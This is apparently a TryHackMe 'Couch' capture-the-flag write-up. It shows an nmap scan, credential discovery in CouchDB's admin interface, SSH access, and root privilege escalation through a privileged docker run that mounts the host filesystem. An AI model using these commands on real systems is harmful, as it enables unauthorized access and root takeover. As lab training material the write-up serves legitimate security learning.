Couch

Date: 01, July, 2021

Author: Dhilip Sanjay S

Click Here to go to the TryHackMe room.

Enumeration

Nmap

$ nmap -sC -sV -p- 10.10.15.199 -oN nmap.out
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-01 14:01 IST
Nmap scan report for 10.10.15.199
Host is up (0.17s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 34:9d:39:09:34:30:4b:3d:a7:1e:df:eb:a3:b0:e5:aa (RSA)
|   256 a4:2e:ef:3a:84:5d:21:1b:b9:d4:26:13:a5:2d:df:19 (ECDSA)
|_  256 e1:6d:4d:fd:c8:00:8e:86:c2:13:2d:c7:ad:85:13:9c (ED25519)
5984/tcp open  http    CouchDB httpd 1.6.1 (Erlang OTP/18)
|_http-server-header: CouchDB/1.6.1 (Erlang OTP/18)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 473.15 seconds

How many ports are open?

Answer: 2

What's is the database management system installed on the server?

Answer: CouchDB

What port is the database management system running on?

Answer: 5984

What's is the version of management system installed on the server?

Answer: 1.6.1

Administration tool

What is path for the web administration tool for this database management system?

Answer: _utils

What is path for list all databases in the web browser of the database management system?

Answer: _all_dbs

What is the credentials founed in the web administration tool?

The credentials can be found inside secret collection.

User.txt

$ ssh [email protected]
[email protected]'s password: 
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-193-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
Last login: Fri Dec 18 15:25:27 2020 from 192.168.85.1
atena@ubuntu:~$ ls
user.txt

atena@ubuntu:~$ whoami
atena

atena@ubuntu:~$ cat user.txt 
THM{REDACTED}

Privilege Escalation

Do manual enumeration - check the following for Privilege Escalation:
- Sudo Permissions
- SUID binaries
- Cron Jobs
- Backup files
- History files
- Config files
- Running Processes (ps aux)
By checking the bash history file:

atena@ubuntu:~$ cat .bash_history 
[..snip..]
docker -H 127.0.0.1:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
[..snip..]

Run docker in privileged mode, to get root access:

atena@ubuntu:~$ docker -H 127.0.0.1:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
/ # 
/ # whoami
root

Root.txt

~ # find / -name root.txt 
/mnt/root/root.txt

~ # cat /mnt/root/root.txt
THM{REDACTED}

PreviousLian_Yu NextGateKeeper

Last updated 2 years ago

hashtagEnumeration

hashtagNmap

hashtagHow many ports are open?

hashtagWhat's is the database management system installed on the server?

hashtagWhat port is the database management system running on?

hashtagWhat's is the version of management system installed on the server?

hashtagAdministration tool

hashtagWhat is path for the web administration tool for this database management system?

hashtagWhat is path for list all databases in the web browser of the database management system?

hashtagWhat is the credentials founed in the web administration tool?

hashtagUser.txt

hashtagPrivilege Escalation

hashtagRoot.txt

Enumeration

Nmap

How many ports are open?

What's is the database management system installed on the server?

What port is the database management system running on?

What's is the version of management system installed on the server?

Administration tool

What is path for the web administration tool for this database management system?

What is path for list all databases in the web browser of the database management system?

What is the credentials founed in the web administration tool?

User.txt

Privilege Escalation

Root.txt